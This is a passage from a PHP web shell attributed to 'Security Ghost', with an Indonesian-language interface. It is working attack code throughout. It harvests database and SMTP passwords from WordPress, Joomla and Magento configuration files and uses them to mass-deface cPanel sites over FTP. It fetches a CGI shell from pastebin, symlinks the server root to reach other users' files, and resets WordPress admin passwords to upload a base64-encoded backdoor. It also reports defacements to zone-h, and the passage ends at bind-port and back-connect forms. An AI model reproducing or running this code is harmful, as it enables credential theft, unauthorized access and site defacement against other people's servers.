  2173.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2174.                             if((!$ftp_login) || (!$ftp_conn)) {
  2175.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  2176.                             } else {
  2177.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  2178.                                 $fi = htmlspecialchars($_POST['file_deface']);
  2179.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2180.                                 if($deface) {
  2181.                                     $i++;
  2182.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  2183.                                     if(function_exists('posix_getpwuid')) {
  2184.                                         $domain_cp = file_get_contents("/etc/named.conf");
  2185.                                         if($domain_cp == '') {
  2186.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2187.                                         } else {
  2188.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2189.                                             foreach($domains_cp[1] as $dj) {
  2190.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2191.                                                 $user_cp_url = $user_cp_url['name'];
  2192.                                                 if($user_cp_url == $ucp) {
  2193.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2194.                                                     break;
  2195.                                                 }
  2196.                                             }
  2197.                                         }
  2198.                                     } else {
  2199.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2200.                                     }
  2201.                                 } else {
  2202.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2203.                                 }
  2204.                             }
  2205.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2206.                         }
  2207.                     }
  2208.                 }
  2209.             }
  2210.         }
  2211.         if($i == 0) {
  2212.         } else {
  2213.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>Security Ghost</font>";
  2214.         }
  2215.     } else {
  2216.         echo "<center>
  2217.         <form method='post'>
  2218.         Filename: <br>
  2219.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2220.         Deface Page: <br>
  2221.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  2222.         USER: <br>
  2223.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2224.         $_usercp = fopen("/etc/passwd","r");
  2225.         while($getu = fgets($_usercp)) {
  2226.             if($getu == '' || !$_usercp) {
  2227.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2228.             } else {
  2229.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2230.                 foreach($u[1] as $user_cp) {
  2231.                         if(is_dir("/home/$user_cp/public_html")) {
  2232.                             echo "$user_cp\n";
  2233.                     }
  2234.                 }
  2235.             }
  2236.         }
  2237.         echo "</textarea><br>
  2238.         PASS: <br>
  2239.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2240.         function cp_pass($dir) {
  2241.             $pass = "";
  2242.             $dira = scandir($dir);
  2243.             foreach($dira as $dirb) {
  2244.                 if(!is_file("$dir/$dirb")) continue;
  2245.                 $ambil = file_get_contents("$dir/$dirb");
  2246.                 if(preg_match("/WordPress/", $ambil)) {
  2247.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2248.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2249.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2250.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2251.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2252.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2253.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2254.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2255.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2256.                 } elseif(preg_match("/client/", $ambil)) {
  2257.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2258.                     if(preg_match('/"/', $pass1[1])) {
  2259.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2260.                         $pass .= $pass1[1]."\n";
  2261.                     }
  2262.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2263.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2264.                 }
  2265.             }
  2266.             echo $pass;
  2267.         }
  2268.         $cp_pass = cp_pass($dir);
  2269.         echo $cp_pass;
  2270.         echo "</textarea><br>
  2271.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2272.         </form>
  2273.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2274.     }
  2275. } elseif($_GET['do'] == 'smtp') {
  2276.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2277.     function scj($dir) {
  2278.         $dira = scandir($dir);
  2279.         foreach($dira as $dirb) {
  2280.             if(!is_file("$dir/$dirb")) continue;
  2281.             $ambil = file_get_contents("$dir/$dirb");
  2282.             $ambil = str_replace("$", "", $ambil);
  2283.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2284.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2285.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2286.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2287.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2288.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2289.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2290.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2291.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2292.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2293.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2294.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2295.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2296.             }
  2297.         }
  2298.     }
  2299.     $smpt_hunter = scj($dir);
  2300.     echo $smpt_hunter;
  2301. } elseif($_GET['do'] == 'auto_wp') {
  2302.     if($_POST['hajar']) {
  2303.         $title = htmlspecialchars($_POST['new_title']);
  2304.         $pn_title = str_replace(" ", "-", $title);
  2305.         if($_POST['cek_edit'] == "Y") {
  2306.             $script = $_POST['edit_content'];
  2307.         } else {
  2308.             $script = $title;
  2309.         }
  2310.         $conf = $_POST['config_dir'];
  2311.         $scan_conf = scandir($conf);
  2312.         foreach($scan_conf as $file_conf) {
  2313.             if(!is_file("$conf/$file_conf")) continue;
  2314.             $config = file_get_contents("$conf/$file_conf");
  2315.             if(preg_match("/WordPress/", $config)) {
  2316.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2317.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2318.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2319.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2320.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2321.                 $prefix = $dbprefix."posts";
  2322.                 $option = $dbprefix."options";
  2323.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2324.                 $db = mysql_select_db($dbname);
  2325.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2326.                 $result = mysql_fetch_array($q);
  2327.                 $id = $result[ID];
  2328.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2329.                 $result2 = mysql_fetch_array($q2);
  2330.                 $target = $result2[option_value];
  2331.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2332.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2333.                 echo "<div style='margin: 5px auto;'>";
  2334.                 if($target == '') {
  2335.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2336.                 } else {
  2337.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2338.                 }
  2339.                 if(!$update OR !$conn OR !$db) {
  2340.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2341.                 } else {
  2342.                     echo "<font color=lime>sukses di ganti.</font><br>";
  2343.                 }
  2344.                 echo "</div>";
  2345.                 mysql_close($conn);
  2346.             }
  2347.         }
  2348.     } else {
  2349.         echo "<center>
  2350.         <h1>Auto Edit Title+Content WordPress</h1>
  2351.         <form method='post'>
  2352.         DIR Config: <br>
  2353.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2354.         Set Title: <br>
  2355.         <input type='text' name='new_title' value='Hacked by Security Ghost' placeholder='New Title'><br><br>
  2356.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2357.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2358.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2359.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2360.         </form>
  2361.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2362.         ";
  2363.     }
  2364. }elseif($_GET['do'] == 'defacerid') {
  2365. echo "<center><form method='post'>
  2366.         <u>Defacer</u>: <br>
  2367.         <input type='text' name='hekel' size='50' value='./XvC404'><br>
  2368.         <u>Team</u>: <br>
  2369.         <input type='text' name='tim' size='50' value='Security Ghost'><br>
  2370.         <u>Domains</u>: <br>
  2371.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2372.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2373.         </form>";
  2374. $site = explode("\r\n", $_POST['sites']);
  2375. $go = $_POST['go'];
  2376. $hekel = $_POST['hekel'];
  2377. $tim = $_POST['tim'];
  2378. if($go) {
  2379. foreach($site as $sites) {
  2380. $zh = $sites;
  2381. $form_url = "https://www.defacer.id/notify";
  2382. $data_to_post = array();
  2383. $data_to_post['attacker'] = "$hekel";
  2384. $data_to_post['team'] = "$tim";
  2385. $data_to_post['poc'] = 'SQL Injection';
  2386. $data_to_post['url'] = "$zh";
  2387. $curl = curl_init();
  2388. curl_setopt($curl,CURLOPT_URL, $form_url);
  2389. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2390. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2391. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2392. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2393. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2394. $result = curl_exec($curl);
  2395. echo $result;
  2396. curl_close($curl);
  2397. echo "<br>";
  2398. }
  2399. }
  2400. } elseif($_GET['do'] == 'zoneh') {
  2401.     if($_POST['submit']) {
  2402.         $domain = explode("\r\n", $_POST['url']);
  2403.         $nick =  $_POST['nick'];
  2404.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2405.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2406.         function zoneh($url,$nick) {
  2407.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2408.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2409.                   curl_setopt($ch, CURLOPT_POST, true);
  2410.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2411.             return curl_exec($ch);
  2412.                   curl_close($ch);
  2413.         }
  2414.         foreach($domain as $url) {
  2415.             $zoneh = zoneh($url,$nick);
  2416.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2417.                 echo "$url -> <font color=lime>OK</font><br>";
  2418.             } else {
  2419.                 echo "$url -> <font color=red>ERROR</font><br>";
  2420.             }
  2421.         }
  2422.     } else {
  2423.         echo "<center><form method='post'>
  2424.         <u>Defacer</u>: <br>
  2425.         <input type='text' name='nick' size='50' value='./XvC404'><br>
  2426.         <u>Domains</u>: <br>
  2427.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2428.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2429.         </form>";
  2430.     }
  2431.     echo "</center>";
  2432. } elseif($_GET['do'] == 'cgi') {
  2433.     $cgi_dir = mkdir('idx_cgi', 0755);
  2434.     $file_cgi = "idx_cgi/cgi.izo";
  2435.     $isi_htcgi = "AddHandler cgi-script .izo";
  2436.     $htcgi = fopen(".htaccess", "w");
  2437.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  2438.     $cgi = fopen($file_cgi, "w");
  2439.     fwrite($cgi, $cgi_script);
  2440.     fwrite($htcgi, $isi_htcgi);
  2441.     chmod($file_cgi, 0755);
  2442.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2443. } elseif($_GET['do'] == 'fake_root') {
  2444.     ob_start();
  2445.     $cwd = getcwd();
  2446.     $ambil_user = explode("/", $cwd);
  2447.     $user = $ambil_user[2];
  2448.     if($_POST['reverse']) {
  2449.         $site = explode("\r\n", $_POST['url']);
  2450.         $file = $_POST['file'];
  2451.         foreach($site as $url) {
  2452.             $cek = getsource("$url/~$user/$file");
  2453.             if(preg_match("/hacked/i", $cek)) {
  2454.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  2455.             }
  2456.         }
  2457.     } else {
  2458.         echo "<center><form method='post'>
  2459.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2460.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2461.         Domain: <br>
  2462.         <textarea style='width: 450px; height: 250px;' name='url'>";
  2463.         reverse($_SERVER['HTTP_HOST']);
  2464.         echo "</textarea><br>
  2465.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2466.         </form><br>
  2467.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  2468.     }
  2469. } elseif($_GET['do'] == 'symlink') {
  2470.  
  2471. @set_time_limit(0);
  2472.  
  2473. echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
  2474.  
  2475. @mkdir('sym',0777);
  2476. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2477. $write =@fopen ('sym/.htaccess','w');
  2478. fwrite($write ,$htaccess);
  2479. @symlink('/','sym/root');
  2480. $filelocation = basename(__FILE__);
  2481. $read_named_conf = @file('/etc/named.conf');
  2482. if(!$read_named_conf)
  2483. {
  2484. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2485. }
  2486. else
  2487. {
  2488. echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2489. foreach($read_named_conf as $subject){
  2490. if(eregi('zone',$subject)){
  2491. preg_match_all('#zone "(.*)"#',$subject,$string);
  2492. flush();
  2493. if(strlen(trim($string[1][0])) >2){
  2494. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2495. $name = $UID['name'] ;
  2496. @symlink('/','sym/root');
  2497. $name   = $string[1][0];
  2498. $iran   = '\.ir';
  2499. $israel = '\.il';
  2500. $indo   = '\.id';
  2501. $sg12   = '\.sg';
  2502. $edu    = '\.edu';
  2503. $gov    = '\.gov';
  2504. $gose   = '\.go';
  2505. $gober  = '\.gob';
  2506. $mil1   = '\.mil';
  2507. $mil2   = '\.mi';
  2508. $malay  = '\.my';
  2509. $china  = '\.cn';
  2510. $japan  = '\.jp';
  2511. $austr  = '\.au';
  2512. $porn   = '\.xxx';
  2513. $as     = '\.uk';
  2514. $calfn  = '\.ca';
  2515.  
  2516. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2517. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  2518. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  2519. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  2520. {
  2521. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2522. }
  2523. echo "
  2524. <tr>
  2525.  
  2526. <td>
  2527. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2528. </td>
  2529.  
  2530. <td>
  2531. '.$UID['name']."
  2532. </td>
  2533.  
  2534. <td>
  2535. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2536. </td>
  2537.  
  2538. </tr></div> ";
  2539. flush();
  2540. }
  2541. }
  2542. }
  2543. }
  2544.  
  2545. echo "</center></table>";  
  2546.  
  2547. }   elseif($_GET['do'] == 'adminer') {
  2548.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2549.     function adminer($url, $isi) {
  2550.         $fp = fopen($isi, "w");
  2551.         $ch = curl_init();
  2552.               curl_setopt($ch, CURLOPT_URL, $url);
  2553.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2554.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2555.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2556.               curl_setopt($ch, CURLOPT_FILE, $fp);
  2557.         return curl_exec($ch);
  2558.               curl_close($ch);
  2559.         fclose($fp);
  2560.         ob_flush();
  2561.         flush();
  2562.     }
  2563.     if(file_exists('adminer.php')) {
  2564.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2565.     } else {
  2566.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2567.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2568.         } else {
  2569.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  2570.         }
  2571.     }
  2572. } elseif($_GET['do'] == 'auto_dwp') {
  2573.     if($_POST['auto_deface_wp']) {
  2574.         function anucurl($sites) {
  2575.             $ch = curl_init($sites);
  2576.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2577.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2578.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2579.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2580.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2581.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2582.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2583.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2584.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2585.             $data = curl_exec($ch);
  2586.                   curl_close($ch);
  2587.             return $data;
  2588.         }
  2589.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2590.             $post = array(
  2591.                    "log" => "$userr",
  2592.                    "pwd" => "$pass",
  2593.                    "rememberme" => "forever",
  2594.                    "wp-submit" => "$wp_submit",
  2595.                    "redirect_to" => "$web",
  2596.                    "testcookie" => "1",
  2597.                    );
  2598.             $ch = curl_init($cek);
  2599.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2600.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2601.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2602.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2603.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2604.                   curl_setopt($ch, CURLOPT_POST, 1);
  2605.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2606.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2607.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2608.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2609.             $data = curl_exec($ch);
  2610.                   curl_close($ch);
  2611.             return $data;
  2612.         }
  2613.         $scan = $_POST['link_config'];
  2614.         $link_config = scandir($scan);
  2615.         $script = htmlspecialchars($_POST['script']);
  2616.         $user = "global";
  2617.         $pass = "global";
  2618.         $passx = md5($pass);
  2619.         foreach($link_config as $dir_config) {
  2620.             if(!is_file("$scan/$dir_config")) continue;
  2621.             $config = file_get_contents("$scan/$dir_config");
  2622.             if(preg_match("/WordPress/", $config)) {
  2623.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2624.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2625.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2626.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2627.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2628.                 $prefix = $dbprefix."users";
  2629.                 $option = $dbprefix."options";
  2630.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2631.                 $db = mysql_select_db($dbname);
  2632.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2633.                 $result = mysql_fetch_array($q);
  2634.                 $id = $result[ID];
  2635.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2636.                 $result2 = mysql_fetch_array($q2);
  2637.                 $target = $result2[option_value];
  2638.                 if($target == '') {                
  2639.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2640.                 } else {
  2641.                     echo "[+] $target <br>";
  2642.                 }
  2643.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2644.                 if(!$conn OR !$db OR !$update) {
  2645.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2646.                     mysql_close($conn);
  2647.                 } else {
  2648.                     $site = "$target/wp-login.php";
  2649.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  2650.                     $b1 = anucurl($site2);
  2651.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2652.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2653.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2654.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2655.                     $www = "m.php";
  2656.                     $fp5 = fopen($www,"w");
  2657.                     fputs($fp5,$upload3);
  2658.                     $post2 = array(
  2659.                             "_wpnonce" => "$anu2",
  2660.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2661.                             "themezip" => "@$www",
  2662.                             "install-theme-submit" => "Install Now",
  2663.                             );
  2664.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2665.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2666.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2667.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2668.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2669.                           curl_setopt($ch, CURLOPT_POST, 1);
  2670.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2671.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2672.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2673.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2674.                     $data3 = curl_exec($ch);
  2675.                           curl_close($ch);
  2676.                     $y = date("Y");
  2677.                     $m = date("m");
  2678.                     $namafile = "id.php";
  2679.                     $fpi = fopen($namafile,"w");
  2680.                     fputs($fpi,$script);
  2681.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2682.                            curl_setopt($ch6, CURLOPT_POST, true);
  2683.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2684.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2685.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2686.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2687.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2688.                     $postResult = curl_exec($ch6);
  2689.                            curl_close($ch6);
  2690.                     $as = "$target/k.php";
  2691.                     $bs = anucurl($as);
  2692.                     if(preg_match("#$script#is", $bs)) {
  2693.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2694.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2695.                         } else {
  2696.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2697.                         echo "[!!] coba aja manual: <br>";
  2698.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2699.                         echo "[+] username: <font color=lime>$user</font><br>";
  2700.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2701.                         }
  2702.                     mysql_close($conn);
  2703.                 }
  2704.             }
  2705.         }
  2706.     } else {
  2707.         echo "<center><h1>WordPress Auto Deface</h1>
  2708.         <form method='post'>
  2709.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2710.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by ./XvC404' required><br>
  2711.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2712.         </form>
  2713.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2714.         </center>";
  2715.     }
  2716. } elseif($_GET['do'] == 'network') {
  2717.     echo "<form method='post'>
  2718.     <u>Bind Port:</u> <br>
  2719.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2720.     <input type='submit' name='sub_bp' value='>>'>
  2721.     </form>
  2722.     <form method='post'>
  2723.     <u>Back Connect:</u> <br>
  2724.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2725.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2726.     <input type='submit' name='sub_bc' value='>>'>
  2727.     </form>";
